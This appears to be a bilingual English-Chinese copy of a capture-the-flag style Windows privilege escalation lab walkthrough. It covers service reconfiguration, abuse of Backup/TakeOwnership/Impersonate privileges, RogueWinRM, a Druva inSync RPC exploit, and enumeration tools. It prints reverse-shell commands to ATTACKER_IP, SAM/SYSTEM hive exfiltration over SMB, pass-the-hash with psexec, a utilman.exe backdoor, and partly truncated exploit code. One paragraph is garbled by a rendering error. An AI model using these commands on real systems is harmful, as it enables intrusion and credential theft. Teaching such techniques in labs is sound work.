You might still have a slight chance of taking advantage of a service if the service’s executable DACL is well configured, and the service’s binary path is rightly quoted. Should the service DACL (not the service’s executable DACL) allow you to modify the configuration of a service, you will be able to reconfigure the service. This will allow you to point to any executable you need and run it with any account you prefer, including SYSTEM itself.如果服务的可执行 DACL 配置良好,并且正确引用了服务的二进制路径,那么您仍然有机会利用该服务。如果服务 DACL (不是服务的可执行DACL )允许您修改服务的配置,您将能够重新配置该服务。这将允许您指向所需的任何可执行文件并使用您喜欢的任何帐户运行它,包括 SYSTEM 本身。

To check for a service DACL from the command line, you can use Accesschk from the Sysinternals suite. For your convenience, a copy is available at C:\tools. The command to check for the thmservice service DACL is:要从命令行检查服务 DACL,您可以使用 Sysinternals 套件中的Accesschk 。为了您的方便,可以在C:\tools中获取副本。检查 thmservice 服务DACL 的命令是:

Command Prompt 命令提示符

C:\tools\AccessChk> accesschk64.exe -qlc thmservice

Here we can see that the BUILTIN\Users group has the SERVICE_ALL_ACCESS permission, which means any user can reconfigure the service.在这里我们可以看到BUILTIN\Users组具有SERVICE_ALL_ACCESS权限,这意味着任何用户都可以重新配置服务。

Before changing the service, let’s build another exe-service reverse shell and start a listener for it on the attacker’s machine:在更改服务之前,让我们构建另一个 exe-service 反向 shell,并在攻击者的计算机上启动它的侦听器:

Kali 卡利语Linux

user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exeuser@attackerpc$ nc -lvp 4447

We will then transfer the reverse shell executable to the target machine and store it in C:\Users\thm-unpriv\rev-svc3.exe. Feel free to use wget to transfer your executable and move it to the desired location. Remember to grant permissions to Everyone to execute your payload:然后我们将反向 shell 可执行文件传输到目标机器并将其存储在 C:\Users\thm-unpriv\rev-svc3.exe 。请随意使用 wget 传输您的可执行文件并将其移动到所需的位置。请记住授予每个人执行您的有效负载的权限:

Command Prompt 命令提示符

C:\> icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

To change the service’s associated executable and account, we can use the following command (mind the spaces after the equal signs when using sc.exe):要更改服务关联的可执行文件和帐户,我们可以使用以下命令(使用 sc.exe 时请注意等号后面的空格):

Command Prompt 命令提示符

C:\> sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

Notice we can use any account to run the service. We chose LocalSystem as it is the highest privileged account available. To trigger our payload, all that rests is restarting the service:请注意,我们可以使用任何帐户来运行该服务。我们选择 LocalSystem,因为它是可用的最高特权帐户。要触发我们的有效负载,剩下的就是重新启动服务:

Command Prompt 命令提示符

C:\> sc stop THMService
C:\> sc start THMService

And we will receive a shell back in our attacker’s machine with SYSTEM privileges:我们将在攻击者的机器上收到一个具有系统权限的 shell:

Kali 卡利语Linux

user@attackerpc$ nc -lvp 4447Listening on 4447
Connection received on 50650
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.


Go to the Administrator’s desktop to retrieve a flag. Don’t forget to input the flag at the end of this task.转至管理员桌面检索标志。不要忘记在此任务结束时输入标志。



Task 6 Abusing dangerous privileges 滥用危险的特权

Windows Privileges Windows 权限

Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.权限是帐户执行特定系统相关任务所拥有的权利。这些任务可以像关闭计算机的权限一样简单,也可以像绕过某些基于DACL的访问控制的权限一样简单。

Each user has a set of assigned privileges that can be checked with the following command:每个用户都有一组分配的权限,可以使用以下命令进行检查:

whoami /priv

A complete list of available privileges on Windows systems is available here. From an attacker’s standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on the Priv2Admin Github project.此处提供了 Windows 系统上可用权限的完整列表。从攻击者的角度来看,只有那些允许我们在系统中升级的权限才有意义。您可以在Priv2Admin Github 项目上找到可利用权限的完整列表。

While we won’t take a look at each of them, we will showcase how to abuse some of the most common privileges you can find.虽然我们不会逐一查看,但我们将展示如何滥用您可以找到的一些最常见的特权。

SeBackup / SeRestore Se备份/Se恢复

The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.SeBackup 和 SeRestore 权限允许用户读取和写入系统中的任何文件,忽略任何DACL 。此权限背后的想法是允许某些用户从系统执行备份,而无需完全管理权限。

Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator’s password hash.有了这种能力,攻击者可以使用多种技术轻松提升系统权限。我们将研究的方法包括复制 SAM 和 SYSTEM 注册表配置单元以提取本地管理员的密码哈希值。

Log in to the target machine via RDP using the following credentials:使用以下凭据通过RDP登录到目标计算机:

User: THMBackup****用户: THMBackup

Password: CopyMaster555密码: CopyMaster555

This account is part of the “Backup Operators” group, which by default is granted the SeBackup and SeRestore privileges. We will need to open a command prompt using the “Open as administrator” option to use these privileges. We will be asked to input our password again to get an elevated console:该帐户属于“Backup Operators”组,默认情况下被授予 SeBackup 和 SeRestore 权限。我们需要使用“以管理员身份打开”选项打开命令提示符才能使用这些权限。我们将被要求再次输入密码以获得提升的控制台:

Once on the command prompt, we can check our privileges with the following command:进入命令提示符后,我们可以使用以下命令检查我们的权限:

Command Prompt 命令提示符

C:\> whoami /priv


Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

To backup the SAM and SYSTEM hashes, we can use the following commands:要备份 SAM 和 SYSTEM 哈希值,我们可以使用以下命令:

Command Prompt 命令提示符

C:\> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.

C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.

This will create a couple of files with the registry hives content. We can now copy these files to our attacker machine using SMB or any other available method. For SMB, we can use impacket’s smbserver.py to start a simple SMB server with a network share in the current directory of our AttackBox:这将创建几个包含注册表配置单元内容的文件。现在,我们可以使用 SMB 或任何其他可用方法将这些文件复制到攻击者计算机。对于 SMB,我们可以使用 impacket 的smbserver.py在 AttackBox 的当前目录中启动一个带有网络共享的简单SMB服务器:

Kali 卡利语Linux

user@attackerpc$ mkdir shareuser@attackerpc$ python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

This will create a share named public pointing to the share directory, which requires the username and password of our current windows session. After this, we can use the copy command in our windows machine to transfer both files to our AttackBox: 这将创建一个名为public共享,指向share目录,这需要当前 Windows 会话的用户名和密码。之后,我们可以在 Windows 机器中使用copy命令将这两个文件传输到 AttackBox:

Command Prompt 命令提示符

C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\

And use impacket to retrieve the users’ password hashes:并使用 impacket 检索用户的密码哈希值:

Kali 卡利语Linux

user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCALImpacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)

We can finally use the Administrator’s hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges:我们终于可以使用管理员的哈希来执行哈希传递攻击并获得具有系统权限的目标计算机的访问权限:

Kali 卡利语Linux

user@attackerpc$ python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@MACHINE_IPImpacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file nfhtabqO.exe
[*] Opening SVCManager on
[*] Creating service RoLE on
[*] Starting service RoLE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

SeTakeOwnership 取得所有权

The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service’s executable. For this task, we will be taking a different route, however.SeTakeOwnership 权限允许用户获取系统上任何对象的所有权,包括文件和注册表项,这为攻击者提升权限提供了多种可能性,例如,我们可以搜索作为 SYSTEM 运行的服务并获取所有权服务的可执行文件。然而,对于这项任务,我们将采取不同的路线。

Log in to the target machine via RDP using the following credentials:使用以下凭据通过RDP登录到目标计算机:

User: THMTakeOwnership****用户: THMTakeOwnership

Password: TheWorldIsMine2022****密码: TheWorldIsMine2022

To get the SeTakeOwnership privilege, we need to open a command prompt using the “Open as administrator” option. We will be asked to input our password to get an elevated console:要获得 SeTakeOwnership 权限,我们需要使用“以管理员身份打开”选项打开命令提示符。我们将被要求输入密码以获得提升的控制台:

Once on the command prompt, we can check our privileges with the following command:进入命令提示符后,我们可以使用以下命令检查我们的权限:

Command Prompt 命令提示符

C:\> whoami /priv


Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Disabled

We’ll abuse utilman.exe to escalate privileges this time. Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen:这次我们将滥用utilman.exe来升级权限。 Utilman 是一个内置的 Windows 应用程序,用于在锁定屏幕期间提供“轻松访问”选项:

Since Utilman is run with SYSTEM privileges, we will effectively gain SYSTEM privileges if we replace the original binary for any payload we like. As we can take ownership of any file, replacing it is trivial.由于 Utilman 是以 SYSTEM 权限运行的,因此如果我们将原始二进制文件替换为我们喜欢的任何有效负载,我们将有效地获得 SYSTEM 权限。由于我们可以拥有任何文件的所有权,因此替换它是微不足道的。

To replace utilman, we will start by taking ownership of it with the following command:要替换 utilman,我们将首先使用以下命令获取它的所有权:

Command Prompt 命令提示符

C:\> takeown /f C:\Windows\System32\Utilman.exe

SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".

Notice that being the owner of a file doesn’t necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need. To give your user full permissions over utilman.exe you can use the following command:请注意,成为文件的所有者并不一定意味着您拥有该文件的权限,但作为所有者,您可以为自己分配所需的任何权限。要为您的用户授予 utilman.exe 的完全权限,您可以使用以下命令:

Command Prompt 命令提示符

C:\> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: Utilman.exe
Successfully processed 1 files; Failed processing 0 files

After this, we will replace utilman.exe with a copy of cmd.exe:之后,我们将用 cmd.exe 的副本替换 utilman.exe:

Command Prompt 命令提示符

C:\Windows\System32\> copy cmd.exe utilman.exe
        1 file(s) copied.

To trigger utilman, we will lock our screen from the start button:要触发 utilman,我们将从开始按钮锁定屏幕:

And finally, proceed to click on the “Ease of Access” button, which runs utilman.exe with SYSTEM privileges. Since we replaced it with a cmd.exe copy, we will get a command prompt with SYSTEM privileges:最后,继续单击“轻松访问”按钮,该按钮将以系统权限运行 utilman.exe。由于我们将其替换为 cmd.exe 副本,因此我们将获得具有 SYSTEM 权限的命令提示符:

SeImpersonate / SeAssignPrimaryToken

These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.这些权限允许进程模拟其他用户并代表他们执行操作。模拟通常包括能够在另一个用户的安全上下文下生成进程或线程。

Impersonation is easily understood when you think about how an FTP server works. The FTP server must restrict users to only access the files they should be allowed to see.当您考虑FTP服务器的工作原理时,就很容易理解模拟。 FTP服务器必须限制用户只能访问他们应该被允许查看的文件。

Let’s assume we have an FTP service running with user ftp. Without impersonation, if user Ann logs into the FTP server and tries to access her files, the FTP service would try to access them with its access token rather than Ann’s:假设我们有一个使用用户ftp运行的FTP服务。在没有模拟的情况下,如果用户 Ann 登录 FTP 服务器并尝试访问她的文件,FTP 服务将尝试使用其访问令牌而不是 Ann 的访问令牌来访问它们:

There are several reasons why using ftp’s token is not the best idea: - For the files to be served correctly, they would need to be accessible to the ftp user. In the example above, the FTP service would be able to access Ann’s files, but not Bill’s files, as the DACL in Bill’s files doesn’t allow user ftp. This adds complexity as we must manually configure specific permissions for each served file/directory. - For the operating system, all files are accessed by user ftp, independent of which user is currently logged in to the FTP service. This makes it impossible to delegate the authorisation to the operating system; therefore, the FTP service must implement it. - If the FTP service were compromised at some point, the attacker would immediately gain access to all of the folders to which the ftp user has access.使用 ftp 令牌不是最好的主意有几个原因: - 为了正确提供文件, ftp用户需要可以访问它们。在上面的示例中,FTP 服务将能够访问 Ann 的文件,但不能访问 Bill 的文件,因为 Bill 文件中的 DACL 不允许用户ftp 。这增加了复杂性,因为我们必须为每个提供的文件/目录手动配置特定权限。 - 对于操作系统,所有文件均由用户ftp访问,与当前登录FTP服务的用户无关。这使得无法将授权委托给操作系统;因此, FTP服务必须实现它。 - 如果FTP服务在某个时刻遭到破坏,攻击者将立即获得对ftp用户有权访问的所有文件夹的访问权限。

If, on the other hand, the FTP service’s user has the SeImpersonate or SeAssignPrimaryToken privilege, all of this is simplified a bit, as the FTP service can temporarily grab the access token of the user logging in and use it to perform any task on their behalf:另一方面,如果 FTP 服务的用户具有 SeImpersonate 或 SeAssignPrimaryToken 权限,则所有这些都会稍微简化,因为FTP服务可以临时获取登录用户的访问令牌,并使用它来执行其上的任何任务。代表:

Now, if user Ann logs in to the FTP service and given that the ftp user has impersonation privileges, it can borrow Ann’s access token and use it to access her files. This way, the files don’t need to provide access to user ftp in any way, and the operating system handles authorisation. Since the FTP service is impersonating Ann, it won’t be able to access Jude’s or Bill’s files during that session.现在,如果用户 Ann 登录到 FTP 服务,并且考虑到 ftp 用户具有模拟权限,则它可以借用 Ann 的访问令牌并使用它来访问她的文件。这样,文件不需要以任何方式提供对用户ftp访问,并且操作系统会处理授权。由于 FTP 服务正在冒充 Ann,因此在该会话期间它将无法访问 Jude 或 Bill 的文件。

As attackers, if we manage to take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.作为攻击者,如果我们设法控制具有 SeImpersonate 或 SeAssignPrimaryToken 权限的进程,我们就可以模拟连接该进程并对其进行身份验证的任何用户。

In Windows systems, you will find that the LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges. Since these accounts are used to spawn services using restricted accounts, it makes sense to allow them to impersonate connecting users if the service needs. Internet Information Services (IIS) will also create a similar default account called “iis apppool\defaultapppool” for web applications.在Windows系统中,你会发现LOCAL SERVICE和NETWORK SERVICE ACCOUNTS已经拥有这样的权限。由于这些帐户用于使用受限帐户生成服务,因此如果服务需要,允许它们模拟连接用户是有意义的。 Internet 信息服务 (IIS) 还将为 Web 应用程序创建一个名为“iis apppool\defaultapppool”的类似默认帐户。

To elevate privileges using such accounts, an attacker needs the following: 1. To spawn a process so that users can connect and authenticate to it for impersonation to occur. 2. Find a way to force privileged users to connect and authenticate to the spawned malicious process.要使用此类帐户提升权限,攻击者需要满足以下条件: 1. 生成一个进程,以便用户可以连接该进程并对其进行身份验证,以进行模拟。 2.找到一种方法来强制特权用户连接并验证生成的恶意进程。

We will use RogueWinRM exploit to accomplish both conditions.我们将使用 RogueWinRM 漏洞来实现这两个条件。

Let’s start by assuming we have already compromised a website running on IIS and that we have planted a web shell on the following address:首先,假设我们已经入侵了一个在 IIS 上运行的网站,并且我们已经在以下地址植入了 Web shell:


We can use the web shell to check for the assigned privileges of the compromised account and confirm we hold both privileges of interest for this task:我们可以使用 Web shell 检查受感染帐户的分配权限,并确认我们拥有此任务感兴趣的两项权限:

To use RogueWinRM, we first need to upload the exploit to the target machine. For your convenience, this has already been done, and you can find the exploit in the C:\tools* folder.要使用RogueWinRM,我们首先需要将漏洞利用程序上传到目标机器。为了您的方便,这已经完成了,您可以在*C:\tools**文件夹中找到该漏洞。

The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used for the WinRM service, which is simply a port that exposes a Powershell console to be used remotely through the network. Think of it like SSH, but using Powershell.RogueWinRM 漏洞利用是可能的,因为每当用户(包括非特权用户)在 Windows 中启动 BITS 服务时,它都会使用系统权限自动创建到端口 5985 的连接。端口 5985 通常用于 WinRM 服务,它只是一个公开 Powershell 控制台以通过网络远程使用的端口。可以将其想象为SSH ,但使用 Powershell。

If, for some reason, the WinRM service isn’t running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the BITS service when starting. If the attacker has SeImpersonate privileges, he can execute any command on behalf of the connecting user, which is SYSTEM.如果由于某种原因,WinRM 服务没有在受害服务器上运行,则攻击者可以在端口 5985 上启动伪造的 WinRM 服务,并在启动时捕获 BITS 服务进行的身份验证尝试。如果攻击者具有SeImpersonate权限,他可以代表连接用户(即SYSTEM)执行任何命令。

Before running the exploit, we’ll start a netcat listener to receive a reverse shell on our attacker’s machine:在运行漏洞之前,我们将启动一个 netcat 侦听器以在攻击者的计算机上接收反向 shell:

Kali 卡利语Linux

user@attackerpc$ nc -lvp 4442

And then, use our web shell to trigger the RogueWinRM exploit using the following command:然后,使用我们的 Web shell 使用以下命令触发 RogueWinRM 漏洞利用:

c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"

Note: The exploit may take up to 2 minutes to work, so your browser may appear as unresponsive for a bit. This happens if you run the exploit multiple times as it must wait for the BITS service to stop before starting it again. The BITS service will stop automatically after 2 minutes of starting.**注意:**该漏洞可能需要长达 2 分钟才能发挥作用,因此您的浏览器可能会出现一段时间无响应。如果您多次运行漏洞利用程序,就会发生这种情况,因为它必须等待 BITS 服务停止才能再次启动。 BITS服务将在启动2分钟后自动停止。

The -p parameter specifies the executable to be run by the exploit, which is nc64.exe in this case. The -a parameter is used to pass arguments to the executable. Since we want nc64 to establish a reverse shell against our attacker machine, the arguments to pass to netcat will be -e cmd.exe ATTACKER_IP 4442.-p参数指定漏洞利用程序运行的可执行文件,在本例中为nc64.exe 。 -a参数用于将参数传递给可执行文件。由于我们希望 nc64 针对攻击者计算机建立反向 shell,因此传递给 netcat 的参数将为**-e cmd.exe ATTACKER_IP 4442** 。

If all was correctly set up, you should expect a shell with SYSTEM privileges:如果一切设置正确,您应该会得到一个具有 SYSTEM 权限的 shell:

Kali 卡利语Linux

user@attackerpc$ nc -lvp 4442Listening on 4442
Connection received on 49755
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

nt authority\system

Using any of the three methods discussed in this task, gain access to the Administrator’s desktop and collect the flag. Don’t forget to input the flag at the end of this task.使用本任务中讨论的三种方法中的任何一种,获得对管理员桌面的访问权限并收集标志。不要忘记在此任务结束时输入标志。


Task 7 Abusing vulnerable software 滥用易受攻击的软件

Make sure to click the Start Machine button before you continue, which will deploy the target machine in split-view. If you prefer connecting to the machine via RDP, you can use the following credentials:确保在继续之前单击**“启动计算机”**按钮,这将以拆分视图部署目标计算机。如果您更喜欢通过RDP连接到计算机,则可以使用以下凭据:

Username  用户名thm-unpriv
Password  密码Password321 密码321

Unpatched Software 未打补丁的软件

Software installed on the target system can present various privilege escalation opportunities. As with drivers, organisations and users may not update them as often as they update the operating system. You can use the wmic tool to list software installed on the target system and its versions. The command below will dump information it can gather on installed software (it might take around a minute to finish):目标系统上安装的软件可以提供各种权限升级机会。与驱动程序一样,组织和用户可能不会像更新操作系统那样频繁地更新它们。您可以使用wmic工具列出目标系统上安装的软件及其版本。下面的命令将转储它可以在已安装的软件上收集的信息(可能需要大约一分钟才能完成):

wmic product get name,version,vendor

Remember that the wmic product command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.请记住, wmic product命令可能不会返回所有已安装的程序。根据某些程序的安装方式,它们可能不会在此处列出。检查桌面快捷方式、可用服务或任何表明存在可能易受攻击的其他软件的痕迹始终是值得的。

Once we have gathered product version information, we can always search for existing exploits on the installed software online on sites like exploit-dbpacket storm or plain old Google, amongst many others.一旦我们收集了产品版本信息,我们就可以随时在exploit-db 、 packetstorm或plain old Google等网站上在线搜索已安装软件的现有漏洞。

Using wmic and Google, can you find a known vulnerability on any installed product?使用 wmic 和 Google,您能在任何已安装的产品上找到已知漏洞吗?

Case Study: Druva inSync 6.6.3案例研究:Druva inSync 6.6.3

The target server is running Druva inSync 6.6.3, which is vulnerable to privilege escalation as reported by Matteo Malvica. The vulnerability results from a bad patch applied over another vulnerability reported initially for version 6.5.0 by Chris Lyne.目标服务器正在运行 Druva inSync 6.6.3,正如Matteo Malvica报告的那样,该服务器容易受到权限升级的影响。该漏洞是由于对Chris Lyne最初报告的 6.5.0 版本的另一个漏洞应用了错误补丁而导致的。

The software is vulnerable because it runs an RPC (Remote Procedure Call) server on port 6064 with SYSTEM privileges, accessible from localhost only. If you aren’t familiar with RPC, it is simply a mechanism that allows a given process to expose functions (called procedures in RPC lingo) over the network so that other machines can call them remotely.该软件容易受到攻击,因为它在端口 6064 上运行具有系统权限的 RPC(远程过程调用)服务器,只能从本地主机访问。如果您不熟悉 RPC,它只是一种允许给定进程通过网络公开函数(RPC 行话中称为过程)的机制,以便其他计算机可以远程调用它们。

In the case of Druva inSync, one of the procedures exposed (specifically procedure number 5) on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as SYSTEM, any command gets executed with SYSTEM privileges.对于 Druva inSync,端口 6064 上公开的过程之一(特别是过程号 5)允许任何人请求执行任何命令。由于 RPC 服务器以 SYSTEM 身份运行,因此任何命令都以 SYSTEM 权限执行。

The original vulnerability reported on versions 6.5.0 and prior allowed any command to be run without restrictions. The original idea behind providing such functionality was to remotely execute some specific binaries provided with inSync, rather than any command. Still, no check was made to make sure of that.6.5.0 及更早版本中报告的原始漏洞允许不受限制地运行任何命令。提供此类功能的最初想法是远程执行 inSync 提供的一些特定二进制文件,而不是任何命令。尽管如此,仍然没有进行任何检查来确保这一点。

A patch was issued, where they decided to check that the executed command started with the string C:\ProgramData\Druva\inSync4**, where the allowed binaries were supposed to be. But then, this proved insufficient since you could simply make a path traversal attack to bypass this kind of control. Suppose that you want to execute C:\Windows\System32\cmd.exe, which is not in the allowed path; you could simply ask the server to run C:\ProgramData\Druva\inSync4…\Windows\System32\cmd.exe and that would bypass the check successfully.发布了一个补丁,他们决定检查执行的命令是否以字符串C:\ProgramData\Druva\inSync4**开头,这是允许的二进制文件应该在的位置。但是,事实证明这还不够,因为您可以简单地进行路径遍历攻击来绕过这种控制。假设您要执行C:\Windows\System32\cmd.exe ,但它不在允许的路径中;你可以简单地要求服务器运行 C:\ProgramData\Druva\inSync4…\Windows\System32\cmd.exe 这样就可以成功绕过检查。

To put together a working exploit, we need to understand how to talk to port 6064. Luckily for us, the protocol in use is straightforward, and the packets to be sent are depicted in the following diagram:为了构建一个可行的漏洞利用程序,我们需要了解如何与端口 6064 通信。幸运的是,我们使用的协议很简单,要发送的数据包如下图所示:

The first packet is simply a hello packet that contains a fixed string. The second packet indicates that we want to execute procedure number 5, as this is the vulnerable procedure that will execute any command for us. The last two packets are used to send the length of the command and the command string to be executed, respectively.第一个数据包只是一个包含固定字符串的 hello 数据包。第二个数据包表明我们想要执行程序 5,因为这是一个易受攻击的程序,它将为我们执行任何命令。最后两个数据包分别用于发送命令的长度和要执行的命令字符串。

Initially published by Matteo Malvica here, the following exploit can be used in your target machine to elevate privileges and retrieve this task’s flag. For your convenience, here is the original exploit’s code:最初由 Matteo Malvica在此发布,可以在目标计算机中使用以下漏洞来提升权限并检索此任务的标志。为了您的方便,以下是原始漏洞利用代码:

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
$s.Connect("", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);


You can pop a Powershell console and paste the exploit directly to execute it (The exploit is also available in the target machine at C:\tools\Druva_inSync_exploit.txt). Note that the exploit’s default payload, specified in the KaTeX parse error: Undefined control sequence: \tools at position 315: …计算机中使用,网址为 **C:\̲t̲o̲o̲l̲s̲\Druva_inSync_e…cmd变量中指定的漏洞利用的默认有效负载将在系统中创建一个名为pwnd的用户,但不会为其分配管理权限,因此我们可能希望更改有效负载以获取更有用的内容。对于这个房间,我们将更改有效负载以运行以下命令:

net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add

This will create user pwnd with a password of SimplePass123 and add it to the administrators’ group. If the exploit was successful, you should be able to run the following command to verify that the user pwnd exists and is part of the administrators’ group:这将创建密码为SimplePass123的用户pwnd并将其添加到管理员组中。如果利用成功,您应该能够运行以下命令来验证用户pwnd是否存在并且是管理员组的一部分:

Command Prompt 命令提示符

PS C:\> net user pwnd
User name                    pwnd
Full Name
Account active               Yes

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None

As a last step, you can run a command prompt as administrator:最后一步,您可以以管理员身份运行命令提示符:

When prompted for credentials, use the pwnd account. From the new command prompt, you can retrieve your flag from the Administrator’s desktop with the following command type C:\Users\Administrator\Desktop\flag.txt当提示输入凭据时,请使用pwnd帐户。在新的命令提示符下,您可以使用以下命令从管理员桌面检索您的标志 type C:\Users\Administrator\Desktop\flag.txt

Task 8 Tools of the Trade 行业工具

Several scripts exist to conduct system enumeration in ways similar to the ones seen in the previous task. These tools can shorten the enumeration process time and uncover different potential privilege escalation vectors. However, please remember that automated tools can sometimes miss privilege escalation.有几个脚本可以以类似于上一个任务中看到的方式进行系统枚举。这些工具可以缩短枚举过程时间并发现不同的潜在特权升级向量。但是,请记住,自动化工具有时可能会错过权限升级。

Below are a few tools commonly used to identify privilege escalation vectors. Feel free to run them against any of the machines in this room and see if the results match the discussed attack vectors.以下是一些常用于识别权限升级向量的工具。请随意对这个房间中的任何机器运行它们,看看结果是否与讨论的攻击向量相匹配。


WinPEAS is a script developed to enumerate the target system to uncover privilege escalation paths. You can find more information about winPEAS and download either the precompiled executable or a .bat script. WinPEAS will run commands similar to the ones listed in the previous task and print their output. The output from winPEAS can be lengthy and sometimes difficult to read. This is why it would be good practice to always redirect the output to a file, as shown below:WinPEAS 是一个开发用于枚举目标系统以发现权限提升路径的脚本。您可以找到有关 winPEAS 的更多信息并下载预编译的可执行文件或 .bat 脚本。 WinPEAS 将运行与上一个任务中列出的命令类似的命令并打印其输出。 winPEAS 的输出可能很长,有时难以阅读。这就是为什么最好始终将输出重定向到文件,如下所示:

Command Prompt 命令提示符

C:\> winpeas.exe > outputfile.txt

WinPEAS can be downloaded here.WinPEAS 可以在此处下载。

PrivescCheck 隐私检查

PrivescCheck is a PowerShell script that searches common privilege escalation on the target system. It provides an alternative to WinPEAS without requiring the execution of a binary file.PrivescCheck 是一个PowerShell脚本,用于搜索目标系统上的常见权限升级。它提供了 WinPEAS 的替代方案,无需执行二进制文件。

PrivescCheck can be downloaded here.PrivescCheck 可在此处下载。

Reminder: To run PrivescCheck on the target system, you may need to bypass the execution policy restrictions. To achieve this, you can use the Set-ExecutionPolicy cmdlet as shown below.提醒:要在目标系统上运行 PrivescCheck,您可能需要绕过执行策略限制。为此,您可以使用Set-ExecutionPolicy cmdlet,如下所示。

Powershell 电源外壳

PS C:\> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\> . .\PrivescCheck.ps1
PS C:\> Invoke-PrivescCheck

WES-NG: Windows Exploit Suggester - Next GenerationWES-NG:Windows 漏洞利用建议器 - 下一代

Some exploit suggesting scripts (e.g. winPEAS) will require you to upload them to the target system and run them there. This may cause antivirus software to detect and delete them. To avoid making unnecessary noise that can attract attention, you may prefer to use WES-NG, which will run on your attacking machine (e.g. Kali or TryHackMe AttackBox).一些漏洞利用建议脚本(例如 winPEAS)将要求您将它们上传到目标系统并在那里运行它们。这可能会导致防病毒软件检测并删除它们。为了避免发出不必要的噪音来吸引注意力,您可能更喜欢使用 WES-NG,它将在您的攻击机器上运行(例如 Kali 或 TryHackMe AttackBox)。

WES-NG is a Python script that can be found and downloaded here.WES-NG 是一个 Python 脚本,可以在此处找到并下载。

Once installed, and before using it, type the wes.py --update command to update the database. The script will refer to the database it creates to check for missing patches that can result in a vulnerability you can use to elevate your privileges on the target system.安装后,在使用之前,键入wes.py --update命令来更新数据库。该脚本将引用它创建的数据库来检查是否有缺失的补丁,这些补丁可能会导致您可以利用漏洞来提升您在目标系统上的权限。

To use the script, you will need to run the systeminfo command on the target system. Do not forget to direct the output to a .txt file you will need to move to your attacking machine.要使用该脚本,您需要在目标系统上运行systeminfo命令。不要忘记将输出定向到您需要移动到攻击计算机的 .txt 文件。

Once this is done, wes.py can be run as follows;完成后,wes.py 可以按如下方式运行;

Kali 卡利语Linux

user@kali$ wes.py systeminfo.txt

Metasploit 元分析软件

If you already have a Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on the target system.如果目标系统上已有Meterpreter shell,则可以使用 multi/recon/local_exploit_suggester 模块列出可能影响目标系统的漏洞并允许您提升目标系统上的权限。

Task 9 Conclusion 结论

